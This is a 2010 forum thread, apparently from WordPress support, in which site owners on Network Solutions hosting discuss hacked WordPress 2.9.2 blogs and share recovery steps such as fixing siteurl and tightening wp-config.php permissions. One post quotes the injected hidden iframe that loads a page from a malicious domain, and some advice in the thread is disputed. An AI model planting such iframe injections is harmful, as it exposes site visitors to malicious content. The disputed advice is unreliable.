SQL attack on wpress 2.9.2

@gweddig I work for Network Solutions, sorry you had that experience, we are helping our customers .Please see our post https://bit.ly/bscWFQ and send us an email if you still need assistance ( email is in the blog post)

Thanks,

Shashi

@shashib on Twitter

I am currently on hold with Net Sol for more than 1 hour without anyone answering. Uggggg!

I have used the solution from one of the earlier posts where I go to wp_options and change the site URL and it still works. I recently changed all database and WP passwords and just got hacked again a little while ago with the:

“><iframe style=”display:none” height=”0″ width=”1″ src=”https://mainnetsoll.com/grep/”></iframe&gt;

Very frustrating. I see that Net Sol only offers the suggestion of re-installing WP. I may be wrong here, but does that mean all data wiped off the server then re-uploading or just overwriting WP? Either way, won’t I be bringing residual code back in?

On a side note, I have two WP directories running on this server. Each has it’s own database. When I go to Net Sol database configure area, one lets me update the user/pass and backups. The other does not. It will not let me change any of it and it gives me an error about 16 characters in my user (it is only 9 and all protocol has been followed. Does this tell anyone anything?

After 1 hour 45 minute hold, here is what I found out. BTW, the tech was a pretty good guy and I have to admit he was helpful. In a nutshell, their stance is that we need to go back to the supported 2.9.1 version of WP instead of the 2.9.2 beta. He admitted that he was not 100% positive that this would solve it, but felt it would.

Any thoughts on this…?

instead of the 2.9.2 beta.

They blew you off.

2.9.2 is stable The latest stable release of WordPress (Version 2.9.2)

That’s correct, and the 2.9.2 release was actually to address a security problem in the 2.9 branch, so if anything, that’s bad advice, sorry NetSol guys, can’t support your advice there, since 2.9.0 and 2.9.1 are both open to the particular security problem that was addressed.

Network Solutions chaps, if you feel you know something the WordPress security team does not and have information pertaining to a security problem in 2.9.2, please email any information you have along to [email protected]

@bychow26:
Did you notice the domain name used in that iframe?

mainnetsoll or mainNetSoll – looks like hackers specifically target Network Solutions (NetSol).

So WordPress reinstall is only a temporary solution. Guys at Net Sol should catch the hackers that mess with their servers.

@shashib

are you able to set a few dummy blogs on your host and face this problem in progress?

If so, could you please delete the xmlrpc.php file and see how it gets secured?

I have the exact same problem as all of you. Yesterday I changed the site url in the database, change all of my logins and passwords, and I also made a redirection using the .htaccess file in order to have more time to understand what happened. Today when I woke up, I find that my website is online with the same problem. What I don’t understand is that I had left my site with the redirection so it should not be online today!
Do the problems come only from the site url? I have been looking at the files and I found nothing in them.

Good luck to all of us, I’ll be reading you!

A little update.
I have 2 blogs using wordpress. One of them is the 2.9.2 version and the other is the 2.9.1 version. Both of them have been hacked, the only difference is that it is almost not visible in the 2.9.1 version. The site URL has been changed in the database but nothing happens in the front end of the site and the back end is still accessible…

Guys, you might want to look at this post:
https://mby.me/JH

in short:
configuration files should only be read by Apache, but some users (well, lots of users) left it in a way that anyone could read it (755 instead of 750 in Linux slang).

A malicious user at Network Solutions creates a script to find those configuration files that were incorrectly configured.

This same malicious user finds hundreds of configuration files with the incorrect permissions and retrieves the database credentials

Working on changing the permissions now..currently can’t change them as I am not root, emailing NS now.

Forbidden
You don’t have permission to access / on this server.

This is N solution.

this is also interesting:
https://blog.unmaskparasites.com/2010/04/11/network-solutions-and-wordpress-security-flaw/

Also, every time I try to look at the details of a plugin upgrade, I get this message:

An Unexpected HTTP Error occurred during the API request.

@lepensky : If you have enabled your permalinks, you cannot access your files by FTP through Network Solutions. You need to either use a FTP client or reset your permalinks to the default settings.

so far UseShots aka @unmaskparasites stays on the top of this problem.

Thanks, Denis!

#Cacoline, It’s ok now.
I have 750 on WP-config. What about .httaccess file? What is the correct permissions?

first
chmod 640 wp-config.php (no need for x-ecutable)
then change the db passwd in config to match your new wp db passwd, then fix siteurl in wp_options table in your db.

see this and this.